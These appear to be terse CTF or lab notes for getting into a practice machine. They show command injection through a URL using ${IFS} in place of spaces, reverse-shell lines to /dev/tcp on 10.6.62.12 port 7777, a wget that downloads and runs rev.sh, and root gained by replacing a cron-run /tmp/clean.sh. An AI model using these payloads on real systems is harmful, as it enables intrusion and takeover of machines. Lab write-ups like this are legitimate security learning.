hint: need pspy for privilege escalation
getting access. Be thorough when checking the burp suite output to not miss a small detail (that your command actually worked)
`ls`worked but any spaces broke the injection.
How to inject a command with spaces in url?
IFS
`ls${IFS}-la`reverse shell (IFS’ed):
`/bin/bash${IFS}-l${IFS}>${IFS}/dev/tcp/10.6.62.12/7777${IFS}0<&1${IFS}2>&1`doesn’t work. Upload file then run it?
make reverse shell sh in transfer:
/bin/bash$ -l > /dev/tcp/10.6.62.12/7777 0<&1 2>&1wget command IFS’d:
`wget${IFS}http://10.6.62.12/rev.sh`give it perms command IFS’d:
`chmod${IFS}+x${IFS}rev.sh`it doesn’t like the plus sign. +x is also 777 so we can:
`chmod${IFS}777${IFS}rev.sh`now run it:
`./rev.sh`doesn’t like dot
run it using bash:
`bash${IFS}rev.sh`do the enum. Nothing.
LinPEAS highlighted some files that keep running but nothing 100% obvious
PSPY gave us a few processes that keep happening and we saw clean.sh in /tmp
make a clean.sh file that gives us reverse shell and replace the one in /tmp
root!